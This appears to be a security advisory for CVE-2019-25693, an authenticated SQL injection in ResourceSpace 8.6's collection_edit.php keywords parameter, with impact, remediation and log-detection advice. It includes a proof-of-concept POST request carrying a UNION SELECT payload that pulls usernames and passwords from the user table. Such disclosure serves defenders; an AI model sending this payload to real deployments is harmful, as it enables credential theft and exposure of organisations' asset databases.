Overview
CVE-2019-25693 is a high severity SQL injection vulnerability (CVSS 7.1) affecting ResourceSpace version 8.6, an open-source Digital Asset Management (DAM) system. The vulnerability exists in the collection_edit.php script and allows authenticated users to inject arbitrary SQL code through the keywords POST parameter, potentially exposing all data stored in the backend database.
This vulnerability was published to the National Vulnerability Database (NVD) on April 12, 2026.
Technical Details
Vulnerability Type
- CWE Classification: CWE-89 — Improper Neutralization of Special Elements used in an SQL Command (SQL Injection)
- CVSS Score: 7.1 (High)
- Attack Vector: Network
- Authentication Required: Yes (authenticated attacker)
- Attack Complexity: Low
Affected Endpoint
/pages/collection_edit.php
The keywords parameter in a POST request to this endpoint is passed directly into a SQL query without proper sanitization or parameterization, allowing an attacker to inject SQL code.
Proof of Concept
An authenticated attacker can submit a crafted POST request:
POST /pages/collection_edit.php HTTP/1.1
Host: target-resourcespace.example.com
Content-Type: application/x-www-form-urlencoded
Cookie: [valid session]
keywords=' UNION SELECT username,password,NULL FROM user--&...By injecting a SQL UNION SELECT payload into the keywords field, the attacker can extract any table in the database, including:
- User credentials (usernames, password hashes)
- File metadata for all managed assets
- Collection data and sharing permissions
- API keys and tokens if stored in the database
Attack Flow
- Attacker authenticates to ResourceSpace with any valid account (including low-privilege users)
- Attacker navigates to a collection and triggers the
collection_edit.phpendpoint - A crafted
keywordsvalue containing SQL injection payloads is submitted via POST - The unsanitized input is concatenated into a live SQL query
- Database contents are returned within the application response
Impact Assessment
| Impact Area | Description | Severity |
|---|---|---|
| Data Confidentiality | Full database read access | High |
| Privilege Escalation | Extract admin credentials for full takeover | High |
| Data Integrity | Potential for destructive SQL (DROP, UPDATE) | Medium |
| Availability | Database manipulation could corrupt asset library | Medium |
ResourceSpace is commonly used by media organizations, universities, corporations, and government agencies to manage large libraries of digital assets. A successful SQL injection attack against such a deployment could expose:
- Confidential media files and their metadata
- Internal user directories with hashed passwords
- Business-sensitive asset collections
- Authentication tokens for external integrations
Affected Versions
| Product | Affected Version | Fix Status |
|---|---|---|
| ResourceSpace | 8.6 | Upgrade strongly recommended |
Users of ResourceSpace should verify their currently running version and apply updates. The ResourceSpace project actively releases security patches — check the official repository for the latest stable release.
Remediation
Upgrade
Update ResourceSpace to the latest available version. Versions released after the vulnerability disclosure should include a patch for this specific injection point.
If Immediate Upgrade Is Not Possible
-
Restrict access to
collection_edit.phpto trusted IP ranges using web server configuration. -
Deploy a Web Application Firewall (WAF) with SQL injection rules enabled. ModSecurity with the OWASP Core Rule Set (CRS) will block common SQL injection patterns.
-
Implement prepared statements if maintaining a custom fork. Replace the vulnerable query with parameterized SQL:
// Vulnerable (DO NOT USE) $sql = "SELECT * FROM collection WHERE keywords LIKE '%" . $keywords . "%'"; // Fixed — use prepared statement $stmt = $db->prepare("SELECT * FROM collection WHERE keywords LIKE ?"); $stmt->bind_param("s", "%{$keywords}%"); $stmt->execute(); -
Audit database user permissions. The ResourceSpace database account should not have privileges beyond
SELECT,INSERT,UPDATE, andDELETEon required tables. RevokeDROP,CREATE, andGRANTprivileges. -
Rotate all user passwords in any deployment that may have been exploited. If admin credentials were exposed, assume full system compromise.
Detection
Review web server access logs and application logs for:
- POST requests to
collection_edit.phpcontaining SQL metacharacters (',--,UNION,SELECT,1=1) - Unusually large response payloads from collection edit operations
- Database error messages in application responses (sign of error-based injection attempts)
References
- NVD Entry — CVE-2019-25693
- CVSS v3.1 Score: 7.1 High
- Published: April 12, 2026
- ResourceSpace Official Site
Disclosure Timeline
| Date | Event |
|---|---|
| 2019 (original discovery) | Vulnerability identified in ResourceSpace 8.6 |
| April 12, 2026 | Published to National Vulnerability Database (NVD) |
This advisory is provided for defensive and informational purposes. Organizations running ResourceSpace should treat this as a high-priority patch item given the authenticated SQL injection vector.